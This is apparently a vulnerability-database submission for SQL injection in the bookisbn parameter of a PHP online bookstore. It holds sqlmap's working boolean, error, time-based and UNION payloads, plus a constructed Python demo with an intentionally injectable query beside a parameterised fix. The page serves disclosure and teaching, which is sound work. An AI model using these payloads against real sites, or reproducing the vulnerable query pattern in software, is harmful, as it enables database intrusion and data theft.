Submission #43319: SourceCodester Simple Online Book Store System book.php SQL injection

Information

Title: SourceCodester Simple Online Book Store System book.php SQL injection
Description: SQL injection exists in the bookisbn parameter of /obs/book.php. Attackers can insert malicious statements to disambiguate SQL queries.

Request:

    GET /obs/book.php?bookisbn=64568 HTTP/1.1
    Host: 192.168.0.18:8081
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: PHPSESSID=g7kjmvh3bfv7hdval8mjn5kcnj
    Upgrade-Insecure-Requests: 1

sqlmap response:

    sqlmap identified the following injection point(s) with a total of 60 HTTP(s) requests:
    ---
    Parameter: bookisbn (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: bookisbn=64568' AND 1360=1360 AND 'PGUu'='PGUu

        Type: error-based
        Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
        Payload: bookisbn=64568' AND GTID_SUBSET(CONCAT(0x717a787a71,(SELECT (ELT(3201=3201,1))),0x71707a7871),3201) AND 'bAFN'='bAFN

        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: bookisbn=64568' AND (SELECT 2801 FROM (SELECT(SLEEP(5)))jPeL) AND 'nQyG'='nQyG

        Type: UNION query
        Title: Generic UNION query (NULL) - 8 columns
        Payload: bookisbn=-4971' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a787a71,0x6c506b6b5467516766704a68726a75417063447650714a6c756c626b675545577361767a59424955,0x71707a7871),NULL,NULL,NULL-- -
    ---
Source: www.sourcecodester.com/php/15423/simple-online-book-store-system-php-free-source-code.html
User: weicheng (UID 30823)
Submitted: 10/08/2022 03:21 PM (4 years ago)
Moderation: 11/08/2022 11:08 AM (20 hours later)
Status: Approved
VulDB entry: 206166 [SourceCodester Simple Online Book Store System /obs/book.php bookisbn SQL injection]
Points: 17
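The submission gives sqlmap's findings but not the application code behind /obs/book.php, so the following is an added example, written for this page and not taken from the Simple Online Book Store System or from the submitter. It assumes the shape of flaw sqlmap's boolean-based and UNION findings imply (the bookisbn GET value spliced into the SQL text inside a quoted literal) and replays two of the listed probes against a constructed in-memory SQLite table, once against that vulnerable query and once against the parameterised fix. The table name, column names, the two-column SELECT (sqlmap reported 8 columns in the real target) and the use of SQLite rather than MySQL are all assumptions; the MySQL-only GTID_SUBSET and SLEEP payloads are therefore not reproduced.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the application's database. The real schema
    is not on the page; table and column names are assumptions chosen only
    so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books (isbn TEXT, title TEXT, price REAL)")
    conn.executemany("INSERT INTO books VALUES (?, ?, ?)", [
        ("64568", "Example Book", 9.99),
        ("11111", "Other Book", 4.50),
    ])
    return conn


def vulnerable_lookup(conn, bookisbn):
    """Assumed shape of the flaw in book.php: the bookisbn value is spliced
    straight into the SQL text, so a single quote in it ends the literal
    and everything after it is parsed as SQL."""
    sql = f"SELECT title, price FROM books WHERE isbn = '{bookisbn}'"
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, bookisbn):
    """Fix: bind the value as a query parameter; it is never parsed as SQL,
    whatever quotes or keywords it contains."""
    sql = "SELECT title, price FROM books WHERE isbn = ?"
    return conn.execute(sql, (bookisbn,)).fetchall()


def boolean_blind_probe(lookup, conn, base="64568"):
    """Replays sqlmap's boolean-based blind check from the submission: a TRUE
    condition (1360=1360) must leave the response unchanged and a FALSE one
    must change it. Only an injectable parameter shows that pattern; the
    hardened query treats each whole string as an ISBN and returns no row
    for either probe, so baseline and TRUE probe differ."""
    def run(value):
        try:
            return lookup(conn, value)
        except sqlite3.Error:
            # A database error is what sqlmap's error-based technique keys
            # on; for the boolean-based check it is simply "no match".
            return None
    baseline = run(base)
    true_resp = run(f"{base}' AND 1360=1360 AND 'PGUu'='PGUu")
    false_resp = run(f"{base}' AND 1360=1361 AND 'PGUu'='PGUu")
    return baseline == true_resp and true_resp != false_resp


def union_extract(lookup, conn, expression):
    """Replays the UNION probe: a non-existent ISBN (-4971) empties the real
    result set and UNION ALL appends one attacker-chosen row. The query here
    has 2 columns, not the 8 sqlmap found in the real target, so one NULL
    pads the row. sqlmap's 0x717a787a71 / 0x71707a7871 are the markers
    'qzxzq' and 'qpzxq'; they delimit the extracted value in the page body
    so it can be cut out of surrounding HTML."""
    payload = f"-4971' UNION ALL SELECT 'qzxzq' || ({expression}) || 'qpzxq', NULL-- -"
    for row in lookup(conn, payload):
        text = str(row[0])
        if text.startswith("qzxzq") and text.endswith("qpzxq"):
            return text[len("qzxzq"):-len("qpzxq")]
    return None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable query injectable:", boolean_blind_probe(vulnerable_lookup, db))
    print("hardened query injectable:  ", boolean_blind_probe(hardened_lookup, db))
    # Pull a value from a different row than the one the page would show.
    print("extracted via UNION:", union_extract(
        vulnerable_lookup, db, "(SELECT title FROM books WHERE isbn = '11111')"))
```

The probe functions take the lookup as an argument so the same checks run unchanged against both query styles; against a live target the lookup would be an HTTP GET of /obs/book.php with the payload in bookisbn and the comparison would be on response bodies rather than row lists.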
